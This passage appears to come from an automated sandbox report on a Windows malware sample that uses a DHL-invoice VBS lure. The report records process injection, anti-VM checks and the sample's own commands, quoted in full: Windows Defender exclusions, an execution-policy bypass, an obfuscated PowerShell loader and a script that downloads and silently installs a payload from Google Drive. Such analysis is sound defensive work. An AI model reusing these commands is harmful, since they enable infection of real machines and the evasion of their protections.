                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7904Thread sleep count: 300 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7916Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5852Thread sleep count: 1179 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3156Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7204Thread sleep count: 144 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7204Thread sleep time: -72000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7208Thread sleep count: 5692 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7208Thread sleep time: -17076000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7208Thread sleep count: 3929 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7208Thread sleep time: -11787000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7796Thread sleep count: 786 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1228Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8072Thread sleep count: 854 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7968Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7772Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5928Thread sleep count: 1571 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6704Thread sleep time: -30000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1144Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,21_2_100010F1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,23_2_0040928E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,23_2_0041C322
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,23_2_0040C388
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,23_2_004096A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,23_2_00408847
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_00407877 FindFirstFileW,FindNextFileW,23_2_00407877
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,23_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,23_2_00419B86
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,23_2_0040BD72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_0040AE51 FindFirstFileW,FindNextFileW,29_2_0040AE51
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 30_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,30_2_00407EF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 31_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,31_2_00407898
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,23_2_00407CD2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_00418981 memset,GetSystemInfo,29_2_00418981
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                    Source: powershell.exe, 00000003.00000002.1919143366.000002203C510000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1919143366.000002203D8B3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V
                    Source: AddInProcess32.exe, 00000015.00000002.3074510288.0000000000F18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: powershell.exe, 00000003.00000002.1919143366.000002203D8B3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmtoolsd
                    Source: powershell.exe, 00000003.00000002.3052721240.0000022054657000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWI
                    Source: powershell.exe, 0000000D.00000002.2593975190.000001ABA1370000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_100060E2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,29_2_0040DD85
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,23_2_0041CBE1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_10004AB4 mov eax, dword ptr fs:[00000030h]21_2_10004AB4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_00443355 mov eax, dword ptr fs:[00000030h]23_2_00443355
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_1000724E GetProcessHeap,21_2_1000724E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_100060E2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_10002639
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_10002B1C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_0043503C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_00434A8A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_0043BB71
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_00434BD8 SetUnhandledExceptionFilter,23_2_00434BD8

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Yara detected Powershell download and execute
                    Source: Yara matchFile source: amsi64_1928.amsi.csv, type: OTHER
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1800, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1928, type: MEMORYSTR
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;Jump to behavior
                    Bypasses PowerShell execution policy
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\\x11.ps1"
                    Injects a PE file into a foreign processes
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
                    Maps a DLL or memory area into another process
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe protection: execute and read and write
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe protection: execute and read and write
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe protection: execute and read and write
                    Writes to foreign memory regions
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 459000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 471000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 477000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 478000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 479000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 47E000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: B77008
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 459000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 471000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 477000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 478000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 479000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 47E000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: A27008
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 459000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 471000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 477000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 478000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 479000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 47E000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: DCF008
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 459000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 471000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 477000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 478000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 479000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 47E000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 69F008
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 459000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 471000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 477000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 478000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 479000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 47E000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 7C3008
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe23_2_00412132
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_00419662 mouse_event,23_2_00419662
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAGIAMg' + [char]66 + 'jAGEAcw' + [char]66 + 'lAC4AYw' + [char]66 + 'vAG0ALw' + [char]66 + 'jAGwAYQ' + [char]66 + 'zAHMALg' + [char]66 + '0AHgAdAAnACAAKAAgAF0AXQ' + [char]66 + 'bAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAFsAIAAsACAAbA' + [char]66 + 'sAHUAbgAkACAAKA' + [char]66 + 'lAGsAbw' + [char]66 + '2AG4ASQAuACkAIAAnAEkAVg' + [char]66 + 'GAHIAcAAnACAAKA' + [char]66 + 'kAG8AaA' + [char]66 + '0AGUATQ' + [char]66 + '0AGUARwAuACkAJwAxAHMAcw' + [char]66 + 'hAGwAQwAuADMAeQ' + [char]66 + 'yAGEAcg' + [char]66 + 'iAGkATA' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMAJwAoAGUAcA' + [char]66 + '5AFQAdA' + [char]66 + 'lAEcALgApACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAOg' + [char]66 + 'dAG4AaQ' + [char]66 + 'hAG0Abw' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7ACkAIAApACAAJw' + [char]66 + '' + [char]66 + 'ACcAIAAsACAAJwCTIToAkyEnACAAKA' + [char]66 + 'lAGMAYQ' + [char]66 + 'sAHAAZQ' + [char]66 + 'SAC4AZw' + [char]66 + 'TAHoAQw' + [char]66 + 'CAGwAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMANAA2AGUAcw' + [char]66 + 'hAEIAbQ' + [char]66 + 'vAHIARgA6ADoAXQ' + [char]66 + '0AHIAZQ' + [char]66 + '2AG4Abw' + [char]66 + 'DAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'aAGMAQg' + [char]66 + 'jAGEAJAAgAF0AXQ' + [char]66 + 'bAGUAdA' + [char]66 + '5AEIAWwA7ACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAPQAgAFgAUA' + [char]66 + 'VAHUAaAAkADsAKQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAHoAeA' + [char]66 + 'iAGsAbQAkACAAPQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAOwA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHoAeA' + [char]66 + 'iAGsAbQAkADsAKQ' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ' + [char]66 + 'OACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAoACAAPQAgAHoAeA' + [char]66 + 'iAGsAbQAkADsAKQAoAGUAcw' + [char]66 + 'vAHAAcw' + [char]66 + 'pAGQALg' + [char]66 + '6AHgAYg' + [char]66 + 'rAG0AJAA7ACkAIAAnAHQAeA' + [char]66 + '0AC4AMQAwAEwATA' + [char]66 + 'EAC8AMQAwAC8Acg' + [char]66 + 'lAHQAcA' + [char]66 + '5AHIAYw' + [char]66 + 'wAFUALw' + [char]66 + 'yAGIALg' + [char]66 + 'tAG8AYwAuAHQAYQ' + [char]66 + 'yAGIAdg' + [chJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$rrlqq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$rrlqq = ($rrlqq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$rrlqq = ($rrlqq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yzdrg = (New-Object Net.WebClient);$yzdrg.Encoding = [System.Text.Encoding]::UTF8;$yzdrg.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs' -Destination ( $mcYDf + 